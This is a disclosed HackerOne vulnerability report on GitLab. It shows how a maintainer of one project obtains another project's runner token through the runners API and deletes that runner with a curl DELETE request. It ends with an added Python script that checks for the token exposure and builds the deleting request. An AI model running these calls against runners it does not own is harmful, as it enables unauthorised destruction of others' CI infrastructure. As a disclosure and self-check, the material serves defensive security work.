
Delete a registered runner as unauthorised user

HackerOne report #767493 by ashish_r_padelkar on 2020-01-03, assigned to @jeremymatos:

Summary

Hello,

This #685239 is fixed as per the latest security release here https://about.gitlab.com/blog/2020/01/02/security-release-gitlab-12-6-2-released/, which is basically about updating and removing runners as maintainers, but this issue is different.

In this case, you as a project maintainer are able to delete a registered runner in a different project when you don't have rights to do it. This happens when the runner is registered by a user in a separate project and is enabled in a project where you have maintainer rights. You then, as a project maintainer, only have permissions to pause or enable/disable that runner within that project in the UI. However, using the API below, you can delete this registered runner from the different project where you don't have rights.

curl --request DELETE "https://gitlab.example.com/api/v4/runners" --form "token=<authentication_token>"

Steps to reproduce

  1. Create a group and 2 projects within it, Project1 & Project2.
  2. As a project maintainer, register a runner in Project1.
  3. When you navigate to Project2, you have the option to enable it (as you created it in Project1).
  4. Enable this runner in Project2.
  5. Add one more user as project maintainer in Project2.
  6. Log in as the above user now, i.e. the maintainer in Project2.
  7. Go to https://gitlab.com///-/settings/ci_cd#js-runners-settings. You will see that you can either pause or disable the runner. You will not see the Remove Runner option here because this runner is registered in a different project (Project1) where you don't have access.
  8. Now just visit the API https://gitlab.com/api/v4/runners/<ID>. You should see the ID in the page itself.
  9. In the response, you should see the value of the token for this runner. Just copy it and use it in the API below to delete this registered runner:
curl --request DELETE "https://gitlab.com/api/v4/runners" --form "token=<Token_from_above_response>"

What is the current bug behavior?

Allows unauthorised users to delete a registered runner.

What is the expected correct behavior?

In my opinion, the token value should not be exposed to users in the above situations.

Output of checks

This bug happens on GitLab.com and might be on Omnibus installations too!

Regards,
Ashish

Impact

Allows unauthorised deletion of a registered token.
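The two API calls the report chains together (GET /api/v4/runners/<ID> as the second maintainer, then DELETE /api/v4/runners with the token that response hands back) can be turned into a self-check for an instance owner. The script below is an added example, not code from the report or from GitLab: it builds the same requests with the standard library, and its offline part decides from a runner-details JSON body whether the runner token is present, which is the condition that makes the DELETE possible. The field name `token`, the sample JSON bodies, the hostname and the personal-access-token values are assumptions; the runner token in the sample is a placeholder. `runner_delete_request` only constructs the request and never sends it, since sending it removes the runner.

```python
"""Check whether GET /api/v4/runners/<id> exposes a runner's token to a caller
who is only a maintainer on a project that merely *enabled* that runner.
Added example, not from the HackerOne report or from GitLab. The "token" field
name and the sample responses are assumptions about the response shape."""
import json
import urllib.parse
import urllib.request

# Constructed sample bodies (assumed shape) so the check runs offline.
# The leaking one mirrors what the report says step 8 returned: a token field.
LEAKING_RESPONSE = json.dumps({
    "id": 42,
    "description": "project1-runner",
    "active": True,
    "token": "PLACEHOLDER-RUNNER-TOKEN",   # placeholder, not a real token
})
FIXED_RESPONSE = json.dumps({
    "id": 42,
    "description": "project1-runner",
    "active": True,
})


def runner_exposes_token(body: str) -> bool:
    """True when the runner-details JSON carries a non-empty runner token.
    That token is all DELETE /api/v4/runners needs, so its presence for a
    non-owning maintainer is the vulnerable condition the report describes."""
    data = json.loads(body)
    return bool(data.get("token"))


def runner_details_request(base_url: str, runner_id: int,
                           private_token: str) -> urllib.request.Request:
    """GET /api/v4/runners/<id>, authenticated with the personal access token
    of the second maintainer from the report (the one added in step 5)."""
    url = f"{base_url.rstrip('/')}/api/v4/runners/{runner_id}"
    return urllib.request.Request(
        url, headers={"PRIVATE-TOKEN": private_token}, method="GET")


def runner_delete_request(base_url: str,
                          runner_token: str) -> urllib.request.Request:
    """DELETE /api/v4/runners with the runner token as form data, i.e. the
    curl call from the report. Built only; sending it deletes the runner, so
    do that only against an instance and runner you own."""
    body = urllib.parse.urlencode({"token": runner_token}).encode()
    return urllib.request.Request(
        f"{base_url.rstrip('/')}/api/v4/runners", data=body, method="DELETE")


def check_instance(base_url: str, runner_id: int, private_token: str) -> bool:
    """Fetch the runner as the low-privilege maintainer and return True if the
    instance hands back the token (affected), False otherwise."""
    req = runner_details_request(base_url, runner_id, private_token)
    with urllib.request.urlopen(req) as resp:
        return runner_exposes_token(resp.read().decode())


if __name__ == "__main__":
    # Offline demonstration on the constructed bodies.
    for label, body in (("leaking", LEAKING_RESPONSE), ("fixed", FIXED_RESPONSE)):
        print(f"{label}: exposes token = {runner_exposes_token(body)}")
```

To run it against your own instance, call `check_instance("https://gitlab.example.com", 42, "<PAT of the Project2-only maintainer>")`; a `True` result means that account can obtain the token and therefore issue the DELETE the report shows, even though the UI offers it only pause and disable.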